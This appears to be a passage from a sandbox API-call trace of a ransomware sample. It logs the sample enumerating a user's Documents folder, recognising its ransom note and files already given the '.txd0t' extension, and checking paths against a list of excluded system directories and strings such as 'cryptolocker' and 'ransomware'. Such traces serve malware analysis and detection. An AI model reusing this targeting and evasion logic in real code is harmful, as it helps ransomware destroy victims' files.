(psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.138] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcb4b0, ftCreationTime.dwHighDateTime=0x1d5eeb8, ftLastAccessTime.dwLowDateTime=0x6f5cfd20, ftLastAccessTime.dwHighDateTime=0x1d5ecf7, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1fb3, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="CNnaWo_J.xls.txd0t", cAlternateFileName="CNNAWO~1.TXD")) returned 1 [0090.138] StrCmpW (psz1="CNnaWo_J.xls.txd0t", psz2=".") returned 1 [0090.138] StrCmpW (psz1="CNnaWo_J.xls.txd0t", psz2="..") returned 1 [0090.138] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.138] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.138] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="CNnaWo_J.xls.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t" [0090.138] PathFindExtensionW (pszPath="CNnaWo_J.xls.txd0t") returned=".txd0t" [0090.138] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.139] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3bd1d60, ftCreationTime.dwHighDateTime=0x1d5e397, ftLastAccessTime.dwLowDateTime=0xc80579a0, ftLastAccessTime.dwHighDateTime=0x1d5ed7b, ftLastWriteTime.dwLowDateTime=0x519f1183, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5ae8, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="EPWE.xlsx.txd0t", cAlternateFileName="EPWEXL~1.TXD")) returned 1 [0090.139] StrCmpW (psz1="EPWE.xlsx.txd0t", psz2=".") returned 1 [0090.139] StrCmpW (psz1="EPWE.xlsx.txd0t", psz2="..") returned 1 [0090.139] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="EPWE.xlsx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t" [0090.139] PathFindExtensionW (pszPath="EPWE.xlsx.txd0t") returned=".txd0t" [0090.139] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.139] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ab2080, ftCreationTime.dwHighDateTime=0x1d5ec18, ftLastAccessTime.dwLowDateTime=0x976cfd20, ftLastAccessTime.dwHighDateTime=0x1d5ebe8, ftLastWriteTime.dwLowDateTime=0x51a1751f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6758, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="JzVy_5xEKQ.xlsx.txd0t", cAlternateFileName="JZVY_5~1.TXD")) returned 1 [0090.139] StrCmpW (psz1="JzVy_5xEKQ.xlsx.txd0t", psz2=".") returned 1 [0090.139] StrCmpW (psz1="JzVy_5xEKQ.xlsx.txd0t", psz2="..") returned 1 [0090.139] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="JzVy_5xEKQ.xlsx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t" [0090.139] PathFindExtensionW (pszPath="JzVy_5xEKQ.xlsx.txd0t") returned=".txd0t" [0090.139] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.139] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc03379e0, ftCreationTime.dwHighDateTime=0x1d5efd1, ftLastAccessTime.dwLowDateTime=0x7f85f110, ftLastAccessTime.dwHighDateTime=0x1d5ec9e, ftLastWriteTime.dwLowDateTime=0x51a1751f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbca6, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="M24gnx.pps.txd0t", cAlternateFileName="M24GNX~1.TXD")) returned 1 [0090.139] StrCmpW (psz1="M24gnx.pps.txd0t", psz2=".") returned 1 [0090.139] StrCmpW (psz1="M24gnx.pps.txd0t", psz2="..") returned 1 [0090.139] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="M24gnx.pps.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t" [0090.139] PathFindExtensionW (pszPath="M24gnx.pps.txd0t") returned=".txd0t" [0090.139] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.139] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eeea7d0, ftCreationTime.dwHighDateTime=0x1d5e48e, ftLastAccessTime.dwLowDateTime=0xdb33cc00, ftLastAccessTime.dwHighDateTime=0x1d5e1b6, ftLastWriteTime.dwLowDateTime=0x51a3d769, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14790, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="MXMHgMI.ods.txd0t", cAlternateFileName="MXMHGM~1.TXD")) returned 1 [0090.139] StrCmpW (psz1="MXMHgMI.ods.txd0t", psz2=".") returned 1 [0090.139] StrCmpW (psz1="MXMHgMI.ods.txd0t", psz2="..") returned 1 [0090.139] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="MXMHgMI.ods.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t" [0090.139] PathFindExtensionW (pszPath="MXMHgMI.ods.txd0t") returned=".txd0t" [0090.139] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.139] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9261d20, ftCreationTime.dwHighDateTime=0x1d5eff2, ftLastAccessTime.dwLowDateTime=0xf3d4d290, ftLastAccessTime.dwHighDateTime=0x1d5e25b, ftLastWriteTime.dwLowDateTime=0x51a639c0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1fb7, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Uct9z.odt.txd0t", cAlternateFileName="UCT9ZO~1.TXD")) returned 1 [0090.140] StrCmpW (psz1="Uct9z.odt.txd0t", psz2=".") returned 1 [0090.140] StrCmpW (psz1="Uct9z.odt.txd0t", psz2="..") returned 1 [0090.140] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.140] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.140] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="Uct9z.odt.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t" [0090.140] PathFindExtensionW (pszPath="Uct9z.odt.txd0t") returned=".txd0t" [0090.140] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.140] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5d75360, ftCreationTime.dwHighDateTime=0x1d5e92c, ftLastAccessTime.dwLowDateTime=0xbf44d190, ftLastAccessTime.dwHighDateTime=0x1d5e0d2, ftLastWriteTime.dwLowDateTime=0x51a639c0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1498f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="VcL01ptYXVDK5.rtf.txd0t", cAlternateFileName="VCL01P~1.TXD")) returned 1 [0090.140] StrCmpW (psz1="VcL01ptYXVDK5.rtf.txd0t", psz2=".") returned 1 [0090.140] StrCmpW (psz1="VcL01ptYXVDK5.rtf.txd0t", psz2="..") returned 1 [0090.140] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.140] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.140] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="VcL01ptYXVDK5.rtf.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t" [0090.140] PathFindExtensionW (pszPath="VcL01ptYXVDK5.rtf.txd0t") returned=".txd0t" [0090.140] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.140] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3daa4410, ftCreationTime.dwHighDateTime=0x1d5ec82, ftLastAccessTime.dwLowDateTime=0x5ea14610, ftLastAccessTime.dwHighDateTime=0x1d5ea92, ftLastWriteTime.dwLowDateTime=0x51a89b43, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa60f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="VSf1IL-6_DKVGroXOg.docx.txd0t", cAlternateFileName="VSF1IL~1.TXD")) returned 1 [0090.140] StrCmpW (psz1="VSf1IL-6_DKVGroXOg.docx.txd0t", psz2=".") returned 1 [0090.140] StrCmpW (psz1="VSf1IL-6_DKVGroXOg.docx.txd0t", psz2="..") returned 1 [0090.140] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.140] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.140] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="VSf1IL-6_DKVGroXOg.docx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t" [0090.140] PathFindExtensionW (pszPath="VSf1IL-6_DKVGroXOg.docx.txd0t") returned=".txd0t" [0090.140] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.140] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d8a610, ftCreationTime.dwHighDateTime=0x1d5ef08, ftLastAccessTime.dwLowDateTime=0xa080e8e0, ftLastAccessTime.dwHighDateTime=0x1d5e125, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12451, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="w3sXXqR.xlsx.txd0t", cAlternateFileName="W3SXXQ~1.TXD")) returned 1 [0090.141] StrCmpW (psz1="w3sXXqR.xlsx.txd0t", psz2=".") returned 1 [0090.141] StrCmpW (psz1="w3sXXqR.xlsx.txd0t", psz2="..") returned 1 [0090.141] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.141] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.141] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="w3sXXqR.xlsx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t" [0090.141] PathFindExtensionW (pszPath="w3sXXqR.xlsx.txd0t") returned=".txd0t" [0090.141] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.141] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_HV0qcp0pks", cAlternateFileName="_HV0QC~1")) returned 1 [0090.141] StrCmpW (psz1="_HV0qcp0pks", psz2=".") returned 1 [0090.141] StrCmpW (psz1="_HV0qcp0pks", psz2="..") returned 1 [0090.141] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.141] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.141] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="_HV0qcp0pks", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0090.141] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\system32\\") returned 0x0 [0090.141] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.141] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\system\\") returned 0x0 [0090.141] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.141] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.141] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\local\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\boot\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\perflogs\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\programdata\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\drivers\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\wsus\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="crypt_detect") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="cryptolocker") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="ransomware") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\WINDOWS") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.142] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\Program Files") returned 0x0 [0090.142] GetProcessHeap () returned 0xe30000 [0090.142] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x50c) returned 0xecdb80 [0090.142] StrCpyNW (in: psz1=0xecdb80, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") 